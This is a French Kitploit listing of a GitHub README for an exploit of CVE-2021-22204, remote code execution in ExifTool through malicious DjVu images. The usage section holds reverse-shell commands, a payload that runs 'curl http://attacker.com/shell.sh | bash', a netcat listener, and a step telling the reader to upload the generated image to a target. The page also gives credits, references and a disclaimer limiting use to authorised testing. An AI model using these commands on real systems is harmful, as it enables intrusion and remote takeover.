Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-22204 — Exploit RCE pour ExifTool (CVE-2021-22204) - version améliorée, sans dépendance à exiftool | Kitploit
Outils/GitHubGitHub/d4ytox/cve-2021-22204
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubd4ytox/cve-2021-22204

CVE-2021-22204

Exploit RCE pour ExifTool (CVE-2021-22204) - version améliorée, sans dépendance à exiftool

Voir le dépôt
10il y a 18 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-22204 - ExifTool Exécution de code arbitraire

Une preuve de concept améliorée pour CVE-2021-22204, une vulnérabilité dans les versions 7.44 à 12.23 d'ExifTool qui permet l'exécution de code arbitraire lors du traitement de fichiers DjVu malveillants.

Crédits

Ceci est un travail dérivé. La vulnérabilité et l'exploit original ne sont pas de moi.

RôleQui
Vulnérabilité découverte parWilliam Bowling (@wcbowling), signalée via le programme de bug bounty GitLab — avril 2021
PoC original parUNICORD (NicPWNs & Dev-Yeoj)
Modifications dans ce dépôt pard4ytox

Description

Une neutralisation inappropriée des données utilisateur dans le format de fichier DjVu dans les versions 7.44 à 12.23 d'ExifTool permet l'exécution de code arbitraire lors de l'analyse d'une image malveillante. Cet exploit génère un fichier image malveillant qui, lorsqu'il est traité par une version vulnérable d'ExifTool, exécute du code contrôlé par l'attaquant.

Ce que cette version change

En s'appuyant sur UNICORDev/exploit-CVE-2021-22204 :

  • Aucune dépendance à ExifTool sur la machine de l'attaquant - L'original utilise exiftool -config pour intégrer la charge utile, ce qui échoue si votre propre ExifTool est corrigé (v12.24+). Cette version construit une charge utile DjVu pure en utilisant uniquement djvumake.
  • Fonctionne sur Kali moderne - Compatible avec Python 3.12+ (corrige l'avertissement de séquence d'échappement \c)
  • Dépendances minimales - Nécessite uniquement le paquet djvulibre-bin
  • Code propre et minimal - Pas d'art ASCII ni de délais artificiels

Ce sont des modifications d'ingénierie apportées à un exploit existant. Aucune recherche de vulnérabilité n'est revendiquée.

Prérequis

root@kitploit:~
sudo apt install djvulibre-bin

Utilisation

Reverse Shell :

root@kitploit:~
python3 exploit.py -s <LHOST> <LPORT>

Commande personnalisée :

root@kitploit:~
python3 exploit.py -c "id > /tmp/pwned"

Exemples :

root@kitploit:~
# Générer une charge utile reverse shell
python3 exploit.py -s 192.168.1.100 4444

# Générer une charge utile d'exécution de commande  
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"

# Démarrer un écouteur et attendre la connexion
nc -nlvp 4444

L'exploit génère image.jpg - téléversez ce fichier sur une cible où ExifTool le traitera.

Versions affectées

  • ExifTool 7.44 - 12.23

Références

  • Entrée NVD - CVE-2021-22204
  • Rapport original de William Bowling - HackerOne #1154542
  • Avis ExifTool
  • Commit du correctif ExifTool
  • PoC original - UNICORDev/exploit-CVE-2021-22204

Avertissement

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.

L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cet outil. N'utilisez cet exploit que contre des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test.

L'accès non autorisé à des systèmes informatiques est illégal et puni par la loi. Utilisez cet outil de manière responsable.

Licence

MIT, s'appliquant uniquement aux modifications de ce dépôt. Le PoC en amont ne comporte aucune licence, il reste donc tous droits réservés à ses auteurs. Voir LICENSE pour l'avis d'attribution complet.

Télécharger l’outil